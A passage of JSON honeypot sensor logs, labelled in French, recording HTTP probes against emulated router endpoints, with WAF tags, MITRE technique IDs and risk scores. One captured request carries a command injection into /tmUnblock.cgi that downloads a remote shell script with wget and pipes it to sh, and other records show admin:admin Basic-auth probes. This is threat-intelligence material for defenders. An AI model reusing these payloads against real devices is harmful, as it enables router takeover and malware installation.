application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnection: close\\r\\n\\r\\nttcp_num=3\u0026ttcp_size=3\u0026ttcp_ip=-h+%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblkv%3Bbu\u0022, \u0022payload_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d793472b24aa832e3f7d0dff5c19f7864c26b48d\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/tmUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/tmUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/tmUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 242\\r\\nConnect\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":384},{"id":11860742,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59666,"dst_port":81,"service":"http","classification":"web_probe","waf_score":3,"waf_tags":"[\u0022950734:sap-sapcontrol-path\u0022]","http_method":"GET","http_target":"\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 0, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002242099b4af021e53fd8fd4e056c2568d7c2e3ffa8\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 97, \u0022payload_entropy\u0022: 4.9965824971080375, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 20.0, \u0022risk_classification\u0022: 38.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 4.8, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 40, \u0022tag_count\u0022: 5, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022e3345438cd1985cfb314ff4bcc38b4616fd972f1\u0022, \u0022event_fingerprint\u0022: \u00227faab3dd896c75447e800363e774f1eec5b0272f\u0022, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022899350de1515ceebc821db63dd50f3cd\u0022, \u0022path_pattern_hash\u0022: \u00228a5edab282632443219e051e4ade2d1d\u0022}, \u0022service_name\u0022: \u0022http\u0022, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 40}, \u0022payload_preview\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/\u0022, \u0022waf_tags\u0022: [\u0022950734:sap-sapcontrol-path\u0022], \u0022waf_rule_names\u0022: [\u0022sap-sapcontrol-path\u0022], \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022}, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022scanner\u0022], \u0022confidence\u0022: 0.8, \u0022classification_confidence\u0022: 0.8, \u0022recommended_client_action\u0022: \u0022monitor\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221f5c951ac09fe204fc646d4b10cac6ea5b157b3d\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:81 \u00b7 (sonde \/ probe)\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde HTTP (tag sap-sapcontrol-path) \u00b7 confiance 80%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u00b7 risque 40\/100\u0022, \u0022confidence_pct\u0022: 80, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 20.0, \u0022classification\u0022: 38.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 40}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 40, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: null, \u0022tags_summary_labels_fr\u0022: null, \u0022recommended_action\u0022: \u0022monitor\u0022, \u0022recommended_action_label\u0022: \u0022Surveiller\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/\u0022, \u0022request_line\u0022: \u0022GET \/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022Sonde HTTP \u00b7 via HTTP:81 \u00b7 (sonde \/ probe)\u0022, \u0022evidence_snippet\u0022: \u0022GET \/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nConnection: close\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 80 % \u2014 Score WAF 20 \u00b7 1 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022matched_patterns\u0022: [], \u0022ban_policy\u0022: \u0022advisory_monitor\u0022, \u0022tags_list\u0022: [\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 84}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950734:sap-sapcontrol-path\u0022, \u0022http_auth_header_token\u0022, \u0022http_basic_auth\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":4,"bytes_in":97},{"id":11860743,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59668,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":34,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/apply.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002231402cc48ac7ac052e1d50fc94349665a12c2c45\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 527, \u0022payload_entropy\u0022: 5.369565074175084, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c663587837d67542a087ce7094dc34ab8bb0d503\u0022, \u0022event_fingerprint\u0022: \u002256676a028215adbb9fe1a2810691321f4a0be942\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022Cred Basic auth spray\u0022, \u0022CRS 932205\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0463\u0022, \u0022pat-0146\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002207ed2a16e6ad4614ee1b75bae15b85f2\u0022, \u0022path_pattern_hash\u0022: \u0022b3e1dfd605a877958cebee595444f5d1\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026actio\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/apply.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 350\\r\\nConnection: close\\r\\n\\r\\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026actio\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nAuthorization: Basic YWRtaW46YWRtaW4=\\r\\nContent-Type: application\/x-www-form-urlen\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022417ff3d14c1fa639c588ed581b5e4be5f250903a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, 